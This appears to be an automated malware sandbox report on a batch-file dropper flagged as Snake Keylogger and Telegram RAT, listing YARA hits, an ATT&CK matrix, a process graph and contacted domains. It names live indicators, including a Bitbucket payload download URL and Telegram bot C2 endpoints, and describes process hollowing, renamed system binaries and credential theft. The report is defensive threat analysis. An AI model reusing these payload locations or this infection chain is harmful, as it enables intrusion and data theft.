              Source: Yara matchFile source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D154A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF792D154A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D35648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF792D35648
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF792D1227C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF792D2E568

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		2
              Valid Accounts              		1
              Native API              		1
              Scripting              		1
              DLL Side-Loading              		21
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services12
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Shared Modules              		1
              DLL Side-Loading              		2
              Valid Accounts              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		21
              Access Token Manipulation              		2
              Obfuscated Files or Information              		Security Account Manager1
              System Network Connections Discovery              		SMB/Windows Admin Shares1
              Email Collection              		21
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		311
              Process Injection              		1
              Install Root Certificate              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		3
              Software Packing              		LSA Secrets37
              System Information Discovery              		SSHKeylogging114
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp              		Cached Domain Credentials1
              Query Registry              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync231
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
              Masquerading              		Proc Filesystem1
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Valid Accounts              		/etc/passwd and /etc/shadow41
              Virtualization/Sandbox Evasion              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
              Virtualization/Sandbox Evasion              		Network Sniffing1
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation              		Input Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
              Process Injection              		Keylogging1
              System Network Configuration Discovery              		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577663 Sample: F.O Pump Istek,Docx.bat Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 72 api.telegram.org 2->72 74 s3-w.us-east-1.amazonaws.com 2->74 76 5 other IPs or domains 2->76 100 Suricata IDS alerts for network traffic 2->100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 108 16 other signatures 2->108 9 cmd.exe 1 2->9         started        11 Cneehezx.PIF 2->11         started        14 Cneehezx.PIF 2->14         started        signatures3 106 Uses the Telegram API (likely for C&C communication) 72->106 process4 signatures5 16 spoolsv.COM 1 10 9->16         started        21 extrac32.exe 1 9->21         started        23 alpha.exe 1 9->23         started        33 5 other processes 9->33 120 Antivirus detection for dropped file 11->120 122 Writes to foreign memory regions 11->122 124 Allocates memory in foreign processes 11->124 25 xzeheenC.pif 11->25         started        27 cmd.exe 11->27         started        126 Sample uses process hollowing technique 14->126 128 Sample is not signed and drops a device driver 14->128 130 Allocates many large memory junks 14->130 29 xzeheenC.pif 14->29         started        31 cmd.exe 14->31         started        process6 dnsIp7 68 bitbucket.org 185.166.143.48, 443, 49704, 49705 AMAZON-02US Germany 16->68 70 s3-w.us-east-1.amazonaws.com 54.231.224.185, 443, 49706 AMAZON-02US United States 16->70 54 C:\Users\Public\Libraries\xzeheenC.pif, PE32 16->54 dropped 56 C:\Users\Public\Libraries\Cneehezx.PIF, PE32 16->56 dropped 58 C:\Users\Public\Libraries\Cneehezx, data 16->58 dropped 60 C:\Users\Public\Cneehezx.url, MS 16->60 dropped 82 Antivirus detection for dropped file 16->82 84 Drops PE files with a suspicious file extension 16->84 86 Writes to foreign memory regions 16->86 98 5 other signatures 16->98 35 xzeheenC.pif 15 2 16->35         started        39 cmd.exe 1 16->39         started        62 C:\Users\Public\alpha.exe, PE32+ 21->62 dropped 88 Drops PE files to the user root directory 21->88 90 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 21->90 92 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 21->92 41 kn.exe 3 2 23->41         started        43 conhost.exe 27->43         started        94 Tries to steal Mail credentials (via file / registry access) 29->94 96 Tries to harvest and steal browser information (history, passwords, etc) 29->96 45 conhost.exe 31->45         started        47 kn.exe 2 33->47         started        50 extrac32.exe 1 33->50         started        file8 signatures9 process10 dnsIp11 78 checkip.dyndns.com 132.226.8.169, 49707, 49713, 49715 UTMEMUS United States 35->78 80 api.telegram.org 149.154.167.220, 443, 49712, 49714 TELEGRAMRU United Kingdom 35->80 110 Detected unpacking (changes PE section rights) 35->110 112 Detected unpacking (overwrites its own PE header) 35->112 114 Tries to steal Mail credentials (via file / registry access) 35->114 52 conhost.exe 39->52         started        116 Registers a new ROOT certificate 41->116 118 Drops PE files with a suspicious file extension 41->118 64 C:\Users\Public\Libraries\spoolsv.COM, PE32 47->64 dropped 66 C:\Users\Public\kn.exe, PE32+ 50->66 dropped file12 signatures13 process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              F.O Pump Istek,Docx.bat24%ReversingLabsScript-BAT.Trojan.Heuristic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\spoolsv.COM100%AviraHEUR/AGEN.1326111
              C:\Users\Public\Libraries\Cneehezx.PIF100%AviraHEUR/AGEN.1326111
              C:\Users\Public\Libraries\xzeheenC.pif3%ReversingLabs
              C:\Users\Public\alpha.exe0%ReversingLabs
              C:\Users\Public\kn.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP0%Avira URL Cloudsafe
              https://%ws/%ws_%ws_%ws/service.svc/%ws0%Avira URL Cloudsafe
              http://www.pmail.com00%Avira URL Cloudsafe
              http://api.telegram.orgh0%Avira URL Cloudsafe
              https://api.telegram.orgL0%Avira URL Cloudsafe
              https://api.telegram0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              		54.231.224.185
              		truefalse
                		high
                bitbucket.org
                		185.166.143.48
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.8.169
                    		truefalse
                      		high
                      bbuseruploads.s3.amazonaws.com
                      		unknown
                      		unknownfalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzjfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://bitbucket.org/spoolsv.COM, 0000000A.00000002.1583110687.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
                                    		high
                                    https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj2_spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://sectigo.com/CPS0spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                                          		high
                                          https://api.telegram.orgxzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B623000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000227D8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.sectigo.com0spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botxzeheenC.pif, 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.orgLxzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgxzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bitbucket.org/ntim1478/gpmaw/dowspoolsv.COM, 0000000A.00000002.1610085610.000000002083D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                                                            		high
                                                            http://checkip.dyndns.org/hxzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                                                                		high
                                                                https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://checkip.dyndns.org/pxzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.telegramxzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                                                                      		high
